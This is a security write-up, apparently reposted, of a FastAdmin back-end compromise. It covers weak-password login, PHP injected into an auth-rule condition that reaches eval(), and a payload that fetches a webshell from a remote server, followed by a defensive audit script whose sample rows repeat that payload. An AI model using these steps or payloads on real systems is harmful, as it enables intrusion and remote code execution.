219mze posted on 2024-10-10 03:44:23

Notes from a FastAdmin back-end getshell


    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">About FastAdmin</span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">FastAdmin is a rapid back-end development framework built on ThinkPHP5 and Bootstrap. Its add-on (plugin) mechanism is implemented on top of ThinkPHP behaviors, and it ships a large catalogue of add-ons and extensions that can be installed and uninstalled online.</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">It comes with a complete Auth permission-control system: unlimited parent/child permission groups, child permissions that can be assigned freely, and an administrator who can belong to several groups at once.</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">Test process</span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">During initial access on an HVV (护网) engagement we found an asset built on FastAdmin. The screenshot below shows FastAdmin's error page; from experience, the look of this page alone is enough to identify the framework.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4Ztic9NJbPHkfHJGUlibO9jJibELfpUKKhnF4rcM88xORVBYdEROzOabXA/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Appending admin.php brought up the back-end login page, and a weak password got us in.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4mdQVyJTibK2RfJ1BEplp7PPvXt6pv4tRPPnfXP0fLOfOMtNeDJqqvNQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4galN70Kv9wwAOxKFeLzo9tAXkQicribULOAZuhh2wM8ib4Ome6923Dia8A/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Once inside, the job is to find a feature that can be turned into a shell. The back-end ships an add-on (plugin) manager by default, but it was not present in this site's menu, so we went straight to the add-on manager's URL:</span></p><span style="color: black;">/admin/addon?ref=addtabs</span><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4f5FW9YgBnbCib8VEu7zcqMXTnVraGXKAtuMALiadS18oaODBSyq4Akdw/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">In theory, installing the Fileix file manager add-on offline and then uploading a one-line PHP web shell would give a shell, but unfortunately that failed.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4IrCzN04clFu8j1Ysuf0YELUxAfOobYsBdSQgGhp1sPqynoHBh2czYQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Browsing further, the back-end has a scheduled-task (crontab) feature. We tried a reverse shell: saved a task containing the reverse-shell command and listened with nc on our server for the callback, but nothing ever connected; the task was not executed.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4IVR0l5xs4tx8S1BKtvBSAKn65eu1PHcSIV4VKMwsYHc2RP9jm9SA7w/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">A look at the tasks the administrator had set up earlier showed that none of them had ever run either, so this route failed too.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4dFWZbwYQydELAOxzRGUjAzVe7aSlb6taQsUYzyk2xNKZ9GzpsWk6Gw/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Browsing on, the menu rules (菜单规则) under permission management let a rule be created with a condition (条件) field, and we tried putting phpinfo() into that field. The condition field is the sink: for an administrator who is not a super admin, FastAdmin's Auth library (derived from ThinkPHP's Auth class) builds that user's rule list on each permission check, substitutes {field} placeholders with $user['field'] and then evaluates the condition string with eval(). Whatever PHP is stored in the field therefore runs with the web server's privileges.</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">It must be written under Permission Management (权限管理)!!!</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4LaTX3IWCFsusDNCgUDIhtzlsmxGicdvSn7TQCZ14hhEN4sLWgMHKJQQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Then go to Administrator Management and add a new administrator.</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">The group must be a second-level (non-super) administrator group!!! A super admin skips the Auth check entirely, so its rule conditions are never evaluated; a member of any other group triggers the eval() every time their permissions are checked.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib42vZ7m6HITsekSicGOr22npbJDcf9Cky7rx3Qe4C20XqCyDdDGR39JXA/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">After adding the account, log into the back-end again with the new account: phpinfo() is executed successfully.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib43ddqZGlxbnRnsWtRicCfQ16AprDHzDBD7eBF2OMqxRN77l6ibly2BJmw/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Searching the phpinfo() output for $_SERVER['DOCUMENT_ROOT'] gives the web root: /www/wwwroot/xxxxxxxxx/</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4G1Y5ovnOVXSRlXIH7EoVCQhXIfYIVoSjAZJ62vZuLgBOj0JnS2qcLQ/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">With the root path known, log out, put a webshell named 1.php on your own server and serve it with a temporary Python web server:</span></p><span style="color: black;">python3 -m http.server 8080</span><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4Td2HjTla18bWfJDnFL0s2XVCiaYrHMcT7CD0TY3wrHcjl1uv3343F2Q/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">Back in the admin panel, write the following statement into the same condition field; it fetches the webshell from the remote server and writes it into the web root:</span></p><span style="color: black;">file_put_contents('/www/wwwroot/xxxxxxxxx/shell.php', file_get_contents('http://&lt;temporary web server&gt;/1.php'))</span><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4iaVnjZvjPqOo8vkCagyyVbhlMYuLHv0Omc7V1hulaFVdATG6QmTOicQA/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">After saving, log in once more with the newly created user.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4fab6833f0T0d5iaAdrffffLKtVocRwsW3OUUfE3N8iaEaCAibpsIYvbVg/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4WAULvp2Jrfov4iaNcEOAVP96sAE1icFAZiaib5WPXlQ5F7lWKdbQ8XwmEg/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;"></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">The webshell has been written successfully.</span></p><img src="https://mmbiz.qpic.cn/mmbiz_png/XOPdGZ2MYOdxPlmyxWOUUJcCb6ViaS5ib4yk3e2KMtvm9iciaQ5bEqKKIHrcj5BWtLGB3icuIPZlfwHEKRiazIKkiaY0A/640?wx_fmt=png&amp;wxfrom=5&amp;wx_lazy=1&amp;wx_co=1&amp;tp=webp" style="width: 50%; margin-bottom: 20px;">
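    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">The rule condition works as a code sink because the Auth library hands the stored string to eval() while building a non-super administrator's rule list. The script below is an added example written for this page, not code from the original article or from FastAdmin: it applies a whitelist grammar to rows dumped from the auth-rule table (fa_auth_rule with FastAdmin's default prefix, which is an assumption about the deployment) and flags every condition that is not a plain boolean expression over {field} placeholders. The sample rows are constructed, and the host name in the suspicious row is a placeholder. The same function is what the application should run before saving a condition instead of trusting the field to eval().</span></p>

```python
"""Audit auth-rule `condition` fields for planted PHP.

Added example for this write-up, not FastAdmin's own code. In the Auth
library FastAdmin derives from ThinkPHP, a rule's condition string has its
{field} placeholders replaced with $user['field'] and is then passed to
eval() while a non-super administrator's rule list is being built. A
legitimate condition is a small boolean expression such as
"{score}>5 and {level}<10"; anything else deserves a manual look.
"""
import re

# Whitelist grammar: (token class, regex). Order matters, the multi-character
# operators are tried before the lone "!" so that "!=" is not split.
_TOKEN_SPEC = [
    ("value", r"\{\w+\}"),                      # {field} -> $user['field']
    ("value", r"-?\d+(?:\.\d+)?"),              # numeric literal
    ("value", r"'[^'\\]*'"),                    # plain single-quoted string
    ("op",    r"===|!==|==|!=|<=|>=|<|>|&&|\|\||\b(?:and|or)\b"),
    ("not",   r"!|\bnot\b"),
    ("open",  r"\("),
    ("close", r"\)"),
    ("ws",    r"\s+"),
]
_TOKEN_RE = re.compile(
    "|".join(f"(?P<t{i}>{pattern})" for i, (_, pattern) in enumerate(_TOKEN_SPEC)),
    re.IGNORECASE,
)


def condition_is_safe(condition: str) -> bool:
    """True iff `condition` is empty or is a sequence of whitelisted tokens
    shaped as value (op value)*, with balanced parentheses.

    Token filtering alone is not enough: PHP 7 accepts 'phpinfo'() and
    $user['name']() as function calls, so a value may only be followed by
    an operator or a closing parenthesis, never by "(" or another value.
    Arithmetic ("{a} - 1") is rejected too; that is stricter than needed
    but keeps the grammar small.
    """
    if not condition.strip():
        return True                     # empty condition: nothing is eval'd
    expect_value = True                 # at start, after an operator, "(" or "!"
    depth = 0
    pos = 0
    while pos < len(condition):
        m = _TOKEN_RE.match(condition, pos)
        if m is None:
            return False                # bare identifier, ';', '`', '.', '$', ...
        kind = _TOKEN_SPEC[int(m.lastgroup[1:])][0]
        pos = m.end()
        if kind == "ws":
            continue
        if expect_value:
            if kind == "value":
                expect_value = False
            elif kind == "open":
                depth += 1
            elif kind != "not":
                return False            # operator or ")" where a value belongs
        else:
            if kind == "op":
                expect_value = True
            elif kind == "close":
                depth -= 1
                if depth < 0:
                    return False
            else:
                return False            # value followed by "(" or another value
    return (not expect_value) and depth == 0


def audit_rules(rows):
    """rows: (id, name, condition) tuples dumped from the auth-rule table.
    Returns the ids whose condition does not fit the grammar."""
    return [rid for rid, _name, cond in rows if not condition_is_safe(cond or "")]


# Constructed sample rows. The two suspicious ones mirror the payloads used in
# the write-up; the host name is a placeholder.
SAMPLE_RULES = [
    (1, "general", ""),
    (2, "general/config", "{score}>5 and {level}<10"),
    (3, "addon", "phpinfo()"),
    (4, "user/user", "file_put_contents('/www/wwwroot/site/shell.php',"
                     "file_get_contents('http://attacker.example/1.php'))"),
]

if __name__ == "__main__":
    for rid in audit_rules(SAMPLE_RULES):
        cond = next(c for i, _n, c in SAMPLE_RULES if i == rid)
        print(f"rule {rid}: suspicious condition {cond!r}")
```

Run it against a real dump by replacing SAMPLE_RULES with the rows of the auth-rule table; any flagged rule should be paired with a check of which administrators and groups hold it, since the payload only fires for a non-super administrator whose group includes that rule.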
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">Summary</span></strong></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">During initial access, fingerprinting tools identify the stack so that the matching vulnerabilities can be tried; where no fingerprint is recognised, manual judgment is needed, and recognising the framework from the style of its error page is a good method.</span></p><span style="color: black;">Overall attack path: browse the site -&gt; the error page fingerprint is FastAdmin -&gt; weak password into the back-end -&gt; write phpinfo() into a rule condition -&gt; obtain the web root -&gt; write the webshell through a rule condition.</span><span style="color: black;">Source: culprit (Yuque)</span><span style="color: black;">Original: https://www.yuque.com/culprit/note/nyvtuz</span><span style="color: black;">Layout: 潇湘信安</span>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">The techniques, ideas and tools in articles published or reposted by 黑白之道 are for security learning and exchange only; nobody may use them for illegal purposes or for profit, and anyone who does bears the consequences.</span></p>
    <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">If this infringes your rights, message us privately and the article will be removed.</span></p>



